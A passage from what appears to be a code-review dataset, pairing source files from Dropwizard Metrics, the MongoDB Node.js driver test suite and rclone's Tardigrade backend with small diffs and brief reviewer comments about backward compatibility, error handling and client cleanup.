private ScheduledFuture<?> scheduledFuture;
private final MetricFilter filter;
private final double durationFactor;
private final String durationUnit;
private final double rateFactor;
private final String rateUnit;
/**
* Creates a new {@link ScheduledReporter} instance.
*
* @param registry the {@link com.codahale.metrics.MetricRegistry} containing the metrics this
* reporter will report
* @param name the reporter's name
* @param filter the filter for which metrics to report
* @param rateUnit a unit of time
* @param durationUnit a unit of time
*/
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit) {
this(registry, name, filter, rateUnit, durationUnit, createDefaultExecutor(name));
}
/**
* Creates a new {@link ScheduledReporter} instance.
*
* @param registry the {@link com.codahale.metrics.MetricRegistry} containing the metrics this
* reporter will report
* @param name the reporter's name
* @param filter the filter for which metrics to report
* @param executor the executor to use while scheduling reporting of metrics.
*/
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit,
ScheduledExecutorService executor) {
this(registry, name, filter, rateUnit, durationUnit, executor, true);
}
/**
* Creates a new {@link ScheduledReporter} instance.
*
* @param registry the {@link com.codahale.metrics.MetricRegistry} containing the metrics this
* reporter will report
* @param name the reporter's name
* @param filter the filter for which metrics to report
* @param executor the executor to use while scheduling reporting of metrics.
* @param shutdownExecutorOnStop if true, then executor will be stopped in same time with this reporter
*/
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit,
ScheduledExecutorService executor,
boolean shutdownExecutorOnStop) {
this(registry, name, filter, rateUnit, durationUnit, executor, shutdownExecutorOnStop,
Collections.<MetricAttribute>emptySet());
}
protected ScheduledReporter(MetricRegistry registry,
String name,
MetricFilter filter,
TimeUnit rateUnit,
TimeUnit durationUnit,
ScheduledExecutorService executor,
boolean shutdownExecutorOnStop,
Set<MetricAttribute> disabledMetricAttributes) {
this.registry = registry;
this.filter = filter;
this.executor = executor == null? createDefaultExecutor(name) : executor;
this.shutdownExecutorOnStop = shutdownExecutorOnStop;
this.rateFactor = rateUnit.toSeconds(1);
this.rateUnit = calculateRateUnit(rateUnit);
this.durationFactor = 1.0 / durationUnit.toNanos(1);
this.durationUnit = durationUnit.toString().toLowerCase(Locale.US);
this.disabledMetricAttributes = disabledMetricAttributes != null ? disabledMetricAttributes :
Collections.<MetricAttribute>emptySet();
}
/**
* Starts the reporter polling at the given period.
*
* @param period the amount of time between polls
* @param unit the unit for {@code period}
*/
public void start(long period, TimeUnit unit) {
start(period, period, unit);
}
/**
* Starts the reporter polling at the given period.
*
* @param initialDelay the time to delay the first execution
* @param period the amount of time between polls
* @param unit the unit for {@code period}
*/
synchronized public void start(long initialDelay, long period, TimeUnit unit) {
if (this.scheduledFuture != null) {
throw new IllegalArgumentException("Reporter already started");
}
this.scheduledFuture = executor.scheduleAtFixedRate(new Runnable() {
@Override
public void run() {
try {
report();
} catch (Exception ex) {
LOG.error("Exception thrown from {}#report. Exception was suppressed.", ScheduledReporter.this.getClass().getSimpleName(), ex);
}
}
}, initialDelay, period, unit);
}
/**
* Stops the reporter and if shutdownExecutorOnStop is true then shuts down its thread of execution.
*
* Uses the shutdown pattern from http://docs.oracle.com/javase/7/docs/api/java/util/concurrent/ExecutorService.html
*/
public void stop() {
if (shutdownExecutorOnStop) {
executor.shutdown(); // Disable new tasks from being submitted
try {
// Wait a while for existing tasks to terminate
if (!executor.awaitTermination(1, TimeUnit.SECONDS)) {
executor.shutdownNow(); // Cancel currently executing tasks
// Wait a while for tasks to respond to being cancelled
if (!executor.awaitTermination(1, TimeUnit.SECONDS)) {
System.err.println(getClass().getSimpleName() + ": ScheduledExecutorService did not terminate");
}
}
} catch (InterruptedException ie) {
// (Re-)Cancel if current thread also interrupted
executor.shutdownNow();
// Preserve interrupt status
Thread.currentThread().interrupt();
}
} else {
// The external manager(like JEE container) responsible for lifecycle of executor
synchronized (this) {
if (this.scheduledFuture == null) {
// was never started
return;
}
if (this.scheduledFuture.isCancelled()) {
// already cancelled
return;
}
// just cancel the scheduledFuture and exit
this.scheduledFuture.cancel(false);
try {
// Wait a while for existing tasks to terminate
scheduledFuture.get(1, TimeUnit.SECONDS);
} catch (ExecutionException e) {
// well, we should get this error when future is cancelled normally, just ignore it
} catch (InterruptedException e) {
// The thread was interrupted while waiting future to complete
// Preserve interrupt status
Thread.currentThread().interrupt();
if (!this.scheduledFuture.isDone()) {
LOG.warn("The reporting schedulingFuture is not cancelled yet");
}
} catch (TimeoutException e) {
// The last reporting cycle is still in progress, nothing wrong, just add log record
LOG.warn("The reporting schedulingFuture is not cancelled yet");
}
}
}
}
/**
* Stops the reporter and shuts down its thread of execution.
*/
@Override
public void close() {
stop();
}
/**
* Report the current values of all metrics in the registry.
*/
public void report() {
synchronized (this) {
report(registry.getGauges(filter),
registry.getCounters(filter),
registry.getHistograms(filter),
registry.getMeters(filter),
registry.getTimers(filter));
}
}
/**
* Called periodically by the polling thread. Subclasses should report all the given metrics.
*
* @param gauges all of the gauges in the registry
* @param counters all of the counters in the registry
* @param histograms all of the histograms in the registry
* @param meters all of the meters in the registry
* @param timers all of the timers in the registry
*/
public abstract void report(SortedMap<String, Gauge> gauges,
SortedMap<String, Counter> counters,
SortedMap<String, Histogram> histograms,
SortedMap<String, Meter> meters,
SortedMap<String, Timer> timers);
protected String getRateUnit() {
return rateUnit;
}
protected String getDurationUnit() {
return durationUnit;
}
protected double convertDuration(double duration) {
return duration * durationFactor;
}
protected double convertRate(double rate) {
return rate * rateFactor;
}
protected boolean isShutdownExecutorOnStop() {
return shutdownExecutorOnStop;
}
protected Set<MetricAttribute> getDisabledMetricAttributes() {
return disabledMetricAttributes;
}
private String calculateRateUnit(TimeUnit unit) {
final String s = unit.toString().toLowerCase(Locale.US);
return s.substring(0, s.length() - 1);
}
private static ScheduledExecutorService createDefaultExecutor(String name) {
return Executors.newSingleThreadScheduledExecutor(new NamedThreadFactory(name + '-' + FACTORY_ID.incrementAndGet()));
}
}
| 1 | 6,799 | Please, don't remove the `getDisabledMetricAttributes` method. All changes must be backward-compatible. | dropwizard-metrics | java |
@@ -195,7 +195,11 @@ function prepareDatabaseForSuite(suite, context) {
.admin()
.command({ killAllSessions: [] })
.catch(err => {
- if (err.message.match(/no such (cmd|command)/) || err.code === 11601) {
+ if (
+ err.message.match(/no such (cmd|command)/) ||
+ err.message.match(/Failed to kill on some hosts/) ||
+ err.code === 11601
+ ) {
return;
}
| 1 | 'use strict';
const path = require('path');
const fs = require('fs');
const chai = require('chai');
const expect = chai.expect;
const { EJSON } = require('bson');
const { isRecord } = require('../../../src/utils');
const TestRunnerContext = require('./context').TestRunnerContext;
const resolveConnectionString = require('./utils').resolveConnectionString;
// Promise.try alternative https://stackoverflow.com/questions/60624081/promise-try-without-bluebird/60624164?noredirect=1#comment107255389_60624164
function promiseTry(callback) {
return new Promise((resolve, reject) => {
try {
resolve(callback());
} catch (e) {
reject(e);
}
});
}
chai.use(require('chai-subset'));
chai.use(require('./matcher').default);
function escape(string) {
return string.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}
function translateClientOptions(options) {
Object.keys(options).forEach(key => {
if (['j', 'journal', 'fsync', 'wtimeout', 'wtimeoutms'].indexOf(key) >= 0) {
throw new Error(
`Unhandled write concern key needs to be added to options.writeConcern: ${key}`
);
}
if (key === 'w') {
options.writeConcern = { w: options.w };
delete options[key];
} else if (key === 'readConcernLevel') {
options.readConcern = { level: options.readConcernLevel };
delete options[key];
} else if (key === 'autoEncryptOpts') {
options.autoEncryption = Object.assign({}, options.autoEncryptOpts);
if (options.autoEncryptOpts.keyVaultNamespace == null) {
options.autoEncryption.keyVaultNamespace = 'keyvault.datakeys';
}
if (options.autoEncryptOpts.kmsProviders) {
const kmsProviders = EJSON.parse(process.env.CSFLE_KMS_PROVIDERS || 'NOT_PROVIDED');
if (options.autoEncryptOpts.kmsProviders.local) {
kmsProviders.local = options.autoEncryptOpts.kmsProviders.local;
}
if (options.autoEncryptOpts.kmsProviders.awsTemporary) {
kmsProviders.aws = {
accessKeyId: process.env.CSFLE_AWS_TEMP_ACCESS_KEY_ID,
secretAccessKey: process.env.CSFLE_AWS_TEMP_SECRET_ACCESS_KEY,
sessionToken: process.env.CSFLE_AWS_TEMP_SESSION_TOKEN
};
}
if (options.autoEncryptOpts.kmsProviders.awsTemporaryNoSessionToken) {
kmsProviders.aws = {
accessKeyId: process.env.CSFLE_AWS_TEMP_ACCESS_KEY_ID,
secretAccessKey: process.env.CSFLE_AWS_TEMP_SECRET_ACCESS_KEY
};
}
options.autoEncryption.kmsProviders = kmsProviders;
}
delete options.autoEncryptOpts;
}
});
return options;
}
function gatherTestSuites(specPath) {
return fs
.readdirSync(specPath)
.filter(x => x.indexOf('.json') !== -1)
.map(x =>
Object.assign(EJSON.parse(fs.readFileSync(path.join(specPath, x)), { relaxed: true }), {
name: path.basename(x, '.json')
})
);
}
function parseTopologies(topologies) {
if (topologies == null) {
return ['replicaset', 'sharded', 'single'];
}
return topologies;
}
function parseRunOn(runOn) {
return runOn.map(config => {
const topology = parseTopologies(config.topology);
const version = [];
if (config.minServerVersion) {
version.push(`>= ${config.minServerVersion}`);
}
if (config.maxServerVersion) {
version.push(`<= ${config.maxServerVersion}`);
}
const mongodb = version.join(' ');
return { topology, mongodb, authEnabled: !!config.authEnabled };
});
}
function generateTopologyTests(testSuites, testContext, filter) {
testSuites.forEach(testSuite => {
// TODO: remove this when SPEC-1255 is completed
let runOn = testSuite.runOn;
if (!testSuite.runOn) {
runOn = [{ minServerVersion: testSuite.minServerVersion }];
if (testSuite.maxServerVersion) {
runOn.push({ maxServerVersion: testSuite.maxServerVersion });
}
}
const environmentRequirementList = parseRunOn(runOn);
environmentRequirementList.forEach(requires => {
const suiteName = `${testSuite.name} - ${requires.topology.join()}`;
describe(suiteName, {
metadata: { requires },
test: function () {
beforeEach(() => prepareDatabaseForSuite(testSuite, testContext));
afterEach(() => testContext.cleanupAfterSuite());
testSuite.tests.forEach(spec => {
const maybeIt = shouldRunSpecTest(this.configuration, requires, spec, filter)
? it
: it.skip;
maybeIt(spec.description, function () {
let testPromise = Promise.resolve();
if (spec.failPoint) {
testPromise = testPromise.then(() => testContext.enableFailPoint(spec.failPoint));
}
// run the actual test
testPromise = testPromise.then(() =>
runTestSuiteTest(this.configuration, spec, testContext)
);
if (spec.failPoint) {
testPromise = testPromise.then(() => testContext.disableFailPoint(spec.failPoint));
}
return testPromise.then(() => validateOutcome(spec, testContext));
});
});
}
});
});
});
}
function shouldRunSpecTest(configuration, requires, spec, filter) {
if (requires.authEnabled && process.env.AUTH !== 'auth') {
// TODO(NODE-3488): We do not have a way to determine if auth is enabled in our mocha metadata
// We need to do a admin.command({getCmdLineOpts: 1}) if it errors (code=13) auth is on
return false;
}
if (
spec.operations.some(
op => op.name === 'waitForEvent' && op.arguments.event === 'PoolReadyEvent'
)
) {
// TODO(NODE-2994): Connection storms work will add new events to connection pool
return false;
}
if (spec.skipReason || (filter && typeof filter === 'function' && !filter(spec, configuration))) {
return false;
}
return true;
}
// Test runner helpers
function prepareDatabaseForSuite(suite, context) {
context.dbName = suite.database_name || 'spec_db';
context.collectionName = suite.collection_name || 'spec_collection';
const db = context.sharedClient.db(context.dbName);
if (context.skipPrepareDatabase) return Promise.resolve();
const setupPromise = db
.admin()
.command({ killAllSessions: [] })
.catch(err => {
if (err.message.match(/no such (cmd|command)/) || err.code === 11601) {
return;
}
throw err;
});
if (context.collectionName == null || context.dbName === 'admin') {
return setupPromise;
}
const coll = db.collection(context.collectionName);
return setupPromise
.then(() => coll.drop({ writeConcern: { w: 'majority' } }))
.catch(err => {
if (!err.message.match(/ns not found/)) throw err;
})
.then(() => {
if (suite.key_vault_data) {
const dataKeysCollection = context.sharedClient.db('keyvault').collection('datakeys');
return dataKeysCollection
.drop({ writeConcern: { w: 'majority' } })
.catch(err => {
if (!err.message.match(/ns not found/)) {
throw err;
}
})
.then(() => {
if (suite.key_vault_data.length) {
return dataKeysCollection.insertMany(suite.key_vault_data, {
writeConcern: { w: 'majority' }
});
}
});
}
})
.then(() => {
const options = { writeConcern: { w: 'majority' } };
if (suite.json_schema) {
options.validator = { $jsonSchema: suite.json_schema };
}
return db.createCollection(context.collectionName, options);
})
.then(() => {
if (suite.data && Array.isArray(suite.data) && suite.data.length > 0) {
return coll.insertMany(suite.data, { writeConcern: { w: 'majority' } });
}
})
.then(() => {
return context.runForAllClients(client => {
return client
.db(context.dbName)
.collection(context.collectionName)
.distinct('x')
.catch(() => {});
});
});
}
function parseSessionOptions(options) {
const result = Object.assign({}, options);
if (result.defaultTransactionOptions && result.defaultTransactionOptions.readPreference) {
result.defaultTransactionOptions.readPreference = normalizeReadPreference(
result.defaultTransactionOptions.readPreference.mode
);
}
return result;
}
const IGNORED_COMMANDS = new Set(['ismaster', 'configureFailPoint', 'endSessions']);
const SDAM_EVENTS = new Set([
'serverOpening',
'serverClosed',
'serverDescriptionChanged',
'topologyOpening',
'topologyClosed',
'topologyDescriptionChanged',
'serverHeartbeatStarted',
'serverHeartbeatSucceeded',
'serverHeartbeatFailed'
]);
const CMAP_EVENTS = new Set([
'connectionPoolCreated',
'connectionPoolClosed',
'connectionCreated',
'connectionReady',
'connectionClosed',
'connectionCheckOutStarted',
'connectionCheckOutFailed',
'connectionCheckedOut',
'connectionCheckedIn',
'connectionPoolCleared'
]);
let displayCommands = false;
function runTestSuiteTest(configuration, spec, context) {
context.commandEvents = [];
const clientOptions = translateClientOptions(
Object.assign(
{
heartbeatFrequencyMS: 100,
minHeartbeatFrequencyMS: 100,
monitorCommands: true
},
spec.clientOptions
)
);
const url = resolveConnectionString(configuration, spec, context);
const client = configuration.newClient(url, clientOptions);
CMAP_EVENTS.forEach(eventName => client.on(eventName, event => context.cmapEvents.push(event)));
SDAM_EVENTS.forEach(eventName => client.on(eventName, event => context.sdamEvents.push(event)));
let skippedInitialPing = false;
client.on('commandStarted', event => {
if (IGNORED_COMMANDS.has(event.commandName)) {
return;
}
// If credentials were provided, then the Topology sends an initial `ping` command
// that we want to skip
if (event.commandName === 'ping' && client.topology.s.credentials && !skippedInitialPing) {
skippedInitialPing = true;
return;
}
context.commandEvents.push(event);
// very useful for debugging
if (displayCommands) {
// console.dir(event, { depth: 5 });
}
});
return client.connect().then(client => {
context.testClient = client;
const sessionOptions = Object.assign({}, spec.transactionOptions);
spec.sessionOptions = spec.sessionOptions || {};
const database = client.db(context.dbName);
let session0, session1;
let savedSessionData;
if (context.useSessions) {
try {
session0 = client.startSession(
Object.assign({}, sessionOptions, parseSessionOptions(spec.sessionOptions.session0))
);
session1 = client.startSession(
Object.assign({}, sessionOptions, parseSessionOptions(spec.sessionOptions.session1))
);
savedSessionData = {
session0: JSON.parse(EJSON.stringify(session0.id)),
session1: JSON.parse(EJSON.stringify(session1.id))
};
} catch (err) {
// ignore
}
}
// enable to see useful APM debug information at the time of actual test run
// displayCommands = true;
const operationContext = {
client,
database,
collectionName: context.collectionName,
session0,
session1,
testRunner: context
};
let testPromise = Promise.resolve();
return testPromise
.then(() => testOperations(spec, operationContext))
.catch(err => {
// If the driver throws an exception / returns an error while executing this series
// of operations, store the error message.
throw err;
})
.then(() => {
const promises = [];
if (session0) promises.push(session0.endSession());
if (session1) promises.push(session1.endSession());
return Promise.all(promises);
})
.then(() => validateExpectations(context.commandEvents, spec, savedSessionData));
});
}
function validateOutcome(testData, testContext) {
if (testData.outcome && testData.outcome.collection) {
const outcomeCollection = testData.outcome.collection.name || testContext.collectionName;
// use the client without transactions to verify
return testContext.sharedClient
.db(testContext.dbName)
.collection(outcomeCollection)
.find({}, { readPreference: 'primary', readConcern: { level: 'local' } })
.sort({ _id: 1 })
.toArray()
.then(docs => {
expect(docs).to.matchMongoSpec(testData.outcome.collection.data);
});
}
return Promise.resolve();
}
function validateExpectations(commandEvents, spec, savedSessionData) {
if (!spec.expectations || !Array.isArray(spec.expectations) || spec.expectations.length === 0) {
return;
}
const actualEvents = normalizeCommandShapes(commandEvents);
const rawExpectedEvents = spec.expectations.map(x => x.command_started_event);
const expectedEvents = normalizeCommandShapes(rawExpectedEvents);
expect(actualEvents).to.have.length(expectedEvents.length);
expectedEvents.forEach((expected, idx) => {
const actual = actualEvents[idx];
if (expected.commandName != null) {
expect(actual.commandName).to.equal(expected.commandName);
}
if (expected.databaseName != null) {
expect(actual.databaseName).to.equal(expected.databaseName);
}
const actualCommand = actual.command;
const expectedCommand = expected.command;
if (expectedCommand.sort) {
// TODO: This is a workaround that works because all sorts in the specs
// are objects with one key; ideally we'd want to adjust the spec definitions
// to indicate whether order matters for any given key and set general
// expectations accordingly (see NODE-3235)
expect(Object.keys(expectedCommand.sort)).to.have.lengthOf(1);
expect(actualCommand.sort).to.be.instanceOf(Map);
expect(actualCommand.sort.size).to.equal(1);
const expectedKey = Object.keys(expectedCommand.sort)[0];
expect(actualCommand.sort).to.have.all.keys(expectedKey);
actualCommand.sort = { [expectedKey]: actualCommand.sort.get(expectedKey) };
}
expect(actualCommand).withSessionData(savedSessionData).to.matchMongoSpec(expectedCommand);
});
}
function normalizeCommandShapes(commands) {
return commands.map(def => {
const output = JSON.parse(
EJSON.stringify(
{
command: def.command,
commandName: def.command_name || def.commandName || Object.keys(def.command)[0],
databaseName: def.database_name ? def.database_name : def.databaseName
},
{ relaxed: true }
)
);
// TODO: this is a workaround to preserve sort Map type until NODE-3235 is completed
if (def.command.sort) {
output.command.sort = def.command.sort;
}
return output;
});
}
function extractCrudResult(result, operation) {
if (Array.isArray(result) || !isRecord(result)) {
return result;
}
if (result.value) {
// some of our findAndModify results return more than just an id, so we need to pluck
const resultKeys = Object.keys(operation.result);
if (resultKeys.length === 1 && resultKeys[0] === '_id') {
return { _id: result.value._id };
}
return result.value;
}
return operation.result;
}
function isTransactionCommand(command) {
return ['startTransaction', 'commitTransaction', 'abortTransaction'].indexOf(command) !== -1;
}
function isTestRunnerCommand(context, commandName) {
const testRunnerContext = context.testRunner;
let methods = new Set();
let object = testRunnerContext;
while (object !== Object.prototype) {
Object.getOwnPropertyNames(object)
.filter(prop => typeof object[prop] === 'function' && prop !== 'constructor')
.map(prop => methods.add(prop));
object = Object.getPrototypeOf(object);
}
return methods.has(commandName);
}
function extractBulkRequests(requests) {
return requests.map(request => ({ [request.name]: request.arguments }));
}
function translateOperationName(operationName) {
if (operationName === 'runCommand') return 'command';
if (operationName === 'listDatabaseNames') return 'listDatabases';
if (operationName === 'listCollectionNames') return 'listCollections';
return operationName;
}
function normalizeReadPreference(mode) {
return mode.charAt(0).toLowerCase() + mode.substr(1);
}
function resolveOperationArgs(operationName, operationArgs, context) {
const result = [];
function pluck(fromObject, toArray, fields) {
for (const field of fields) {
if (fromObject[field]) toArray.push(fromObject[field]);
}
}
// TODO: migrate all operations here
if (operationName === 'distinct') {
pluck(operationArgs, result, ['fieldName', 'filter']);
if (result.length === 1) result.push({});
} else {
return;
}
// compile the options
const options = {};
if (operationArgs.options) {
Object.assign(options, operationArgs.options);
if (options.readPreference) {
options.readPreference = normalizeReadPreference(options.readPreference.mode);
}
}
if (operationArgs.session) {
if (isTransactionCommand(operationName)) return;
options.session = context[operationArgs.session];
}
result.push(options);
// determine if there is a callback to add
if (operationArgs.callback) {
result.push(() =>
testOperations(operationArgs.callback, context, { swallowOperationErrors: false })
);
}
return result;
}
const CURSOR_COMMANDS = new Set(['find', 'aggregate', 'listIndexes', 'listCollections']);
const ADMIN_COMMANDS = new Set(['listDatabases']);
function maybeSession(operation, context) {
return (
operation &&
operation.arguments &&
operation.arguments.session &&
context[operation.arguments.session]
);
}
const kOperations = new Map([
[
'recordPrimary',
(operation, testRunner, context /*, options */) => {
testRunner.recordPrimary(context.client);
}
],
[
'waitForPrimaryChange',
(operation, testRunner, context /*, options */) => {
return testRunner.waitForPrimaryChange(context.client);
}
],
[
'runOnThread',
(operation, testRunner, context, options) => {
const args = operation.arguments;
const threadName = args.name;
const subOperation = args.operation;
return testRunner.runOnThread(
threadName,
testOperation(subOperation, context[subOperation.object], context, options)
);
}
],
[
'createIndex',
(operation, collection, context /*, options */) => {
const fieldOrSpec = operation.arguments.keys;
const options = { session: maybeSession(operation, context) };
if (operation.arguments.name) options.name = operation.arguments.name;
return collection.createIndex(fieldOrSpec, options);
}
],
[
'createCollection',
(operation, db, context /*, options */) => {
const collectionName = operation.arguments.collection;
const session = maybeSession(operation, context);
return db.createCollection(collectionName, { session });
}
],
[
'dropCollection',
(operation, db, context /*, options */) => {
const collectionName = operation.arguments.collection;
const session = maybeSession(operation, context);
return db.dropCollection(collectionName, { session });
}
],
[
'dropIndex',
(operation, collection /*, context, options */) => {
const indexName = operation.arguments.name;
const session = maybeSession(operation, context);
return collection.dropIndex(indexName, { session });
}
],
[
'mapReduce',
(operation, collection, context /*, options */) => {
const args = operation.arguments;
const map = args.map;
const reduce = args.reduce;
const options = { session: maybeSession(operation, context) };
if (args.out) options.out = args.out;
return collection.mapReduce(map, reduce, options);
}
]
]);
/**
* @param {object} operation the operation definition from the spec test
* @param {object} obj the object to call the operation on
* @param {object} context a context object containing sessions used for the test
* @param {object} [options] Optional settings
* @param {boolean} [options.swallowOperationErrors] Generally we want to observe operation errors, validate them against our expectations, and then swallow them. In cases like `withTransaction` we want to use the same `testOperations` to build the lambda, and in those cases it is not desireable to swallow the errors, since we need to test this behavior.
*/
function testOperation(operation, obj, context, options) {
options = options || { swallowOperationErrors: true };
const opOptions = {};
let args = [];
const operationName = translateOperationName(operation.name);
let opPromise;
if (kOperations.has(operationName)) {
opPromise = kOperations.get(operationName)(operation, obj, context, options);
} else {
if (operation.arguments) {
args = resolveOperationArgs(operationName, operation.arguments, context);
if (args == null) {
args = [];
Object.keys(operation.arguments).forEach(key => {
if (key === 'callback') {
args.push(() =>
testOperations(operation.arguments.callback, context, {
swallowOperationErrors: false
})
);
return;
}
if (['filter', 'fieldName', 'document', 'documents', 'pipeline'].indexOf(key) !== -1) {
return args.unshift(operation.arguments[key]);
}
if ((key === 'map' || key === 'reduce') && operationName === 'mapReduce') {
return args.unshift(operation.arguments[key]);
}
if (key === 'command') return args.unshift(operation.arguments[key]);
if (key === 'requests')
return args.unshift(extractBulkRequests(operation.arguments[key]));
if (key === 'update' || key === 'replacement') return args.push(operation.arguments[key]);
if (key === 'session') {
if (isTransactionCommand(operationName)) return;
opOptions.session = context[operation.arguments.session];
return;
}
if (key === 'returnDocument') {
opOptions.returnDocument = operation.arguments[key].toLowerCase();
return;
}
if (key === 'options') {
Object.assign(opOptions, operation.arguments[key]);
if (opOptions.readPreference) {
opOptions.readPreference = normalizeReadPreference(opOptions.readPreference.mode);
}
return;
}
if (key === 'readPreference') {
opOptions[key] = normalizeReadPreference(operation.arguments[key].mode);
return;
}
opOptions[key] = operation.arguments[key];
});
}
}
if (
args.length === 0 &&
!isTransactionCommand(operationName) &&
!isTestRunnerCommand(context, operationName)
) {
args.push({});
}
if (Object.keys(opOptions).length > 0) {
// NOTE: this is awful, but in order to provide options for some methods we need to add empty
// query objects.
if (operationName === 'distinct') {
args.push({});
}
args.push(opOptions);
}
if (ADMIN_COMMANDS.has(operationName)) {
obj = obj.db().admin();
}
if (operation.name === 'listDatabaseNames' || operation.name === 'listCollectionNames') {
opOptions.nameOnly = true;
}
if (CURSOR_COMMANDS.has(operationName)) {
// `find` creates a cursor, so we need to call `toArray` on it
const cursor = obj[operationName].apply(obj, args);
opPromise = cursor.toArray();
} else {
// wrap this in a `promiseTry` because some operations might throw
opPromise = promiseTry(() => obj[operationName].apply(obj, args));
}
}
if (operation.error) {
opPromise = opPromise.then(
() => {
throw new Error('expected an error!');
},
() => {}
);
}
if (operation.result) {
const result = operation.result;
if (
result.errorContains != null ||
result.errorCodeName ||
result.errorLabelsContain ||
result.errorLabelsOmit
) {
return opPromise.then(
() => {
throw new Error('expected an error!');
},
err => {
const errorContains = result.errorContains;
const errorCodeName = result.errorCodeName;
const errorLabelsContain = result.errorLabelsContain;
const errorLabelsOmit = result.errorLabelsOmit;
if (errorLabelsContain) {
expect(err).to.have.property('errorLabels');
expect(err.errorLabels).to.include.members(errorLabelsContain);
}
if (errorLabelsOmit) {
if (err.errorLabels && Array.isArray(err.errorLabels) && err.errorLabels.length !== 0) {
expect(errorLabelsOmit).to.not.include.members(err.errorLabels);
}
}
if (operation.result.errorContains) {
expect(err.message).to.match(new RegExp(escape(errorContains), 'i'));
}
if (errorCodeName) {
expect(err.codeName).to.equal(errorCodeName);
}
if (!options.swallowOperationErrors) {
throw err;
}
}
);
}
return opPromise.then(opResult => {
const actual = extractCrudResult(opResult, operation);
expect(actual).to.matchMongoSpec(operation.result);
});
}
return opPromise;
}
function convertCollectionOptions(options) {
const result = {};
Object.keys(options).forEach(key => {
if (key === 'readPreference') {
result[key] = normalizeReadPreference(options[key].mode);
} else {
result[key] = options[key];
}
});
return result;
}
function testOperations(testData, operationContext, options) {
options = options || { swallowOperationErrors: true };
return testData.operations.reduce((combined, operation) => {
return combined.then(() => {
const object = operation.object || 'collection';
if (object === 'collection') {
const db = operationContext.database;
const collectionName = operationContext.collectionName;
const collectionOptions = operation.collectionOptions || {};
operationContext[object] = db.collection(
collectionName,
convertCollectionOptions(collectionOptions)
);
}
return testOperation(operation, operationContext[object], operationContext, options);
});
}, Promise.resolve());
}
module.exports = {
TestRunnerContext,
gatherTestSuites,
generateTopologyTests,
parseRunOn
};
| 1 | 20,548 | Is this left over from debugging? | mongodb-node-mongodb-native | js |
@@ -86,7 +86,7 @@ before(function(_done) {
}
this.configuration = new TestConfiguration(parsedURI, context);
- done();
+ client.close(done);
});
});
}); | 1 | 'use strict';
const path = require('path');
const fs = require('fs');
const MongoClient = require('../../..').MongoClient;
const TestConfiguration = require('./config');
const parseConnectionString = require('../../../lib/core/uri_parser');
const eachAsync = require('../../../lib/core/utils').eachAsync;
const mock = require('mongodb-mock-server');
const wtfnode = require('wtfnode');
const MONGODB_URI = process.env.MONGODB_URI || 'mongodb://localhost:27017';
const filters = [];
function initializeFilters(client, callback) {
const filterFiles = fs
.readdirSync(path.join(__dirname, 'filters'))
.filter(x => x.indexOf('js') !== -1);
// context object that can be appended to as part of filter initialization
const context = {};
eachAsync(
filterFiles,
(filterName, cb) => {
const FilterModule = require(path.join(__dirname, 'filters', filterName));
const filter = new FilterModule();
if (typeof filter !== 'object') {
cb(new TypeError('Type of filter must be an object'));
return;
}
if (!filter.filter || typeof filter.filter !== 'function') {
cb(new TypeError('Object filters must have a function named filter'));
return;
}
filters.push(filter);
if (typeof filter.initializeFilter === 'function') {
filter.initializeFilter(client, context, cb);
} else {
cb();
}
},
err => callback(err, context)
);
}
function filterOutTests(suite) {
suite.tests = suite.tests.filter(test => filters.every(f => f.filter(test)));
suite.suites.forEach(suite => filterOutTests(suite));
}
before(function(_done) {
// NOTE: if we first parse the connection string and redact auth, then we can reenable this
// const usingUnifiedTopology = !!process.env.MONGODB_UNIFIED_TOPOLOGY;
// console.log(
// `connecting to: ${chalk.bold(MONGODB_URI)} using ${chalk.bold(
// usingUnifiedTopology ? 'unified' : 'legacy'
// )} topology`
// );
const client = new MongoClient(MONGODB_URI, { useNewUrlParser: true, useUnifiedTopology: true });
const done = err => client.close(err2 => _done(err || err2));
client.connect(err => {
if (err) {
done(err);
return;
}
initializeFilters(client, (err, context) => {
if (err) {
done(err);
return;
}
// replace this when mocha supports dynamic skipping with `afterEach`
filterOutTests(this._runnable.parent);
parseConnectionString(MONGODB_URI, (err, parsedURI) => {
if (err) {
done(err);
return;
}
this.configuration = new TestConfiguration(parsedURI, context);
done();
});
});
});
});
// ensure all mock connections are closed after the suite is run
after(() => mock.cleanup());
// optionally enable test runner-wide plugins
require('./plugins/deferred');
require('./plugins/session_leak_checker');
require('./plugins/client_leak_checker');
// configure mocha and chai
require('mocha-sinon');
const chai = require('chai');
chai.use(require('sinon-chai'));
chai.use(require('../../functional/spec-runner/matcher').default);
chai.config.includeStack = true;
chai.config.showDiff = true;
chai.config.truncateThreshold = 0;
// install signal handlers for printing open/active handles
function dumpAndExit() {
// let other potential handlers run before exiting
process.nextTick(function() {
try {
wtfnode.dump();
} catch (e) {
console.log(e);
}
process.exit();
});
}
process.on('SIGINT', dumpAndExit);
process.on('SIGTERM', dumpAndExit);
| 1 | 18,747 | I've fallen for this before myself :) We _do_ call `close` inside of `done` on L65 | mongodb-node-mongodb-native | js |
@@ -269,7 +269,9 @@ func (f *Fs) connect(ctx context.Context) (project *uplink.Project, err error) {
fs.Debugf(f, "connecting...")
defer fs.Debugf(f, "connected: %+v", err)
- cfg := uplink.Config{}
+ cfg := uplink.Config{
+ UserAgent: "rclone",
+ }
project, err = cfg.OpenProject(ctx, f.access)
if err != nil { | 1 | // +build go1.13,!plan9
// Package tardigrade provides an interface to Tardigrade decentralized object storage.
package tardigrade
import (
"context"
"fmt"
"io"
"log"
"path"
"strings"
"time"
"github.com/pkg/errors"
"github.com/rclone/rclone/fs"
"github.com/rclone/rclone/fs/config"
"github.com/rclone/rclone/fs/config/configmap"
"github.com/rclone/rclone/fs/config/configstruct"
"github.com/rclone/rclone/fs/fserrors"
"github.com/rclone/rclone/fs/hash"
"github.com/rclone/rclone/lib/bucket"
"golang.org/x/text/unicode/norm"
"storj.io/uplink"
)
const (
existingProvider = "existing"
newProvider = "new"
)
var satMap = map[string]string{
"us-central-1.tardigrade.io": "12EayRS2V1kEsWESU9QMRseFhdxYxKicsiFmxrsLZHeLUtdps3S@us-central-1.tardigrade.io:7777",
"europe-west-1.tardigrade.io": "12L9ZFwhzVpuEKMUNUqkaTLGzwY9G24tbiigLiXpmZWKwmcNDDs@europe-west-1.tardigrade.io:7777",
